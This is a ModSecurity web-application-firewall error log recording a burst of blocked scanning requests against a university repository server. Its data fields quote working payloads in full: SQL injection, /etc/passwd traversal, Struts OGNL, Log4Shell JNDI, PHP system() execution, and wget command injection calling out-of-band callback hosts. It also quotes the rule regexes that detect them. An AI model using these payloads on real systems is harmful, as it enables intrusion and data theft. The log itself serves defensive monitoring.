[Tue Aug 29 11:30:11.221486 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAANjpv0AAAAT"]
[Tue Aug 29 11:30:11.873937 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAANh1nsAAAAA"]
[Tue Aug 29 11:30:12.717648 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPQkdkAAAAe"]
[Tue Aug 29 11:30:13.323478 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAN5YFYAAAAN"]
[Tue Aug 29 11:30:14.331696 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAOM4UUAAAAU"]
[Tue Aug 29 11:30:15.353286 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAO8720AAAAF"]
[Tue Aug 29 11:30:15.388043 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPDnvIAAAAP"]
[Tue Aug 29 11:30:16.324013 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgbkddipd84qbp6.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgbkddipd84qbp6.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgbkddipd84qbp6.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPPSs0AAAAd"]
[Tue Aug 29 11:30:17.583642 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPRNYMAAAAf"]
[Tue Aug 29 11:30:19.468226 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPMl@cAAAAY"]
[Tue Aug 29 11:30:20.570486 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAOGae8AAAAS"]
[Tue Aug 29 11:30:22.366759 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOGafMAAAAS"]
[Tue Aug 29 11:30:22.633601 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg1pu3oj594geoq.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOH4SIAAAAH"]
[Tue Aug 29 11:30:23.324502 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAOM4VYAAAAU"]
[Tue Aug 29 11:30:23.360774 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOOuToAAAAW"]
[Tue Aug 29 11:30:24.327486 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAANh1p0AAAAA"]
[Tue Aug 29 11:30:24.345193 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPfm7QAAAAR"]
[Tue Aug 29 11:30:25.316809 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOM4VsAAAAU"]
[Tue Aug 29 11:30:25.416802 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg6dptus4ps4754.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPPSusAAAAd"]
[Tue Aug 29 11:30:26.310317 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPPSu0AAAAd"]
[Tue Aug 29 11:30:28.396643 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOGagEAAAAS"]
[Tue Aug 29 11:30:28.406426 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOGagEAAAAS"]
[Tue Aug 29 11:30:29.351266 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAPXAlUAAAAi"]
[Tue Aug 29 11:30:30.303694 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAOOuUkAAAAW"]
[Tue Aug 29 11:30:30.506828 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPQkfgAAAAe"]
[Tue Aug 29 11:30:31.344623 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAOOuUwAAAAW"]
[Tue Aug 29 11:30:32.607545 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPDnxAAAAAP"]
[Tue Aug 29 11:30:33.439906 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPpWcQAAAAI"]
[Tue Aug 29 11:30:34.350716 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPiBgIAAAAB"]
[Tue Aug 29 11:30:34.358722 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPiBgIAAAAB"]
[Tue Aug 29 11:30:34.439073 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg9cyi1grs7goxk.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPv-EYAAAAM"]
[Tue Aug 29 11:30:34.447960 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPOhY8AAAAa"]
[Tue Aug 29 11:30:35.573595 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAO876AAAAAF"]
